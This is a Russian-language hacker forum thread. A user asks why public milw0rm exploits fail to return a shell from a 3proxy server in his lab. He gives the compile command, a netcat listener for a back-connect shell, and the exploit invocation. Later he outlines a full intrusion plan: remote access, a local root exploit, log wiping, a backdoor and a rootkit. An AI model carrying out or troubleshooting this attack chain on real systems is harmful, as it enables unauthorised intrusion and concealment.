Сам код эксплоита: h_ttp://milw0rm.com/exploits/3829 Тестил в локальное сети. 192.168.2.6 - адрес 3proxy сервера (gentoo 2007, 2.6.23) 192.168.2.3 - адрес атакующего 1. gcc exp.c -o exp 2. nc -l -p 56789 3. ./exp 192.168.2.6 3128 192.168.2.3 0 после выполнения сплоит выдает attacker host, check it up, now! И в итоге нихрена - нет какт молчит команды не выполняет? в чем трабл - что я делаю не так? ____________________________________________________ Так же пробовал другой эксплоит... h_ttp://milw0rm.com/exploits/3821 с ним таже ситуация - не работает! И вообще в случае с этим сплоитом нужно ли выполнять nc 192.168.2.6 <забинденный порт?> или сплоит автоматом биндит, бэкконектится и предоставляет шелл?
ДА! И правда!! Вот какого хера они неправильно и криво пишут свои 3proxy, что эксплойты не работают против них! В СУД ПОДАТЬ!!!
Вообще софт должен писаться под существующие эксплойты. Разработчики должны были на milw0rm сходить, посмотреть коды эксплойтов для их программного продукта и уже в соответствии со сплойтами писать свою программу так, чтобы сплойты работали сразу же после скачивания и хацкеру не нужно было даже лезть в исходник
Ну есть же в паблике эксплоиты работающие сразу! Ясно - что в исходнике этого эксплоита есть бага - Если кто знает подскажите где! Было бы очень кстати
А в чем смысл оставлять чтобы подсказывать? Опять будут кривожопые скрипткиддисы хакать все подряд (ничего личного)
Да ты прав, с одной стороны! Это простая как гвоздь истина... Но помошь благое дело! К тому же когда кидисы были пробемой на то они и кидисы емае ...
>>>К тому же когда кидисы были пробемой ВСЕГДА!!! П.С. - не думал о том что сервис может быть патченый админами которые тоже знают что такое МИЛВОРМ?
Т.е. ты говоришь что кидисы представляют опасность да ну - имхо бред... Как таковой они угрозы не представляют... сам же знаешь что сплоиты почти все с багами выкладывают... ладно не суть! ну зачем так бонально то?! Я вкурсе что пропатчили - итд... У меня цель другая: В универе препод дал задание - в локальной сети из 2, 3 продемонтсрировать реальный взлом... Сначала удаленно получить права(не рутовские ясно дело), потом порутать локальным эксплоитом... Почистить логи - бэкдор поставить , руткит для полноты счастья.. Local Root exploit я нашел, работает на ура через багу vixie-crond на ядре 2.6.16.15... Остаьное тоже все есть и работает как надо... Осталось только найти работающий удаленнй эксплоит под любой демон,и который возвращает шелл или биндит его хотябы...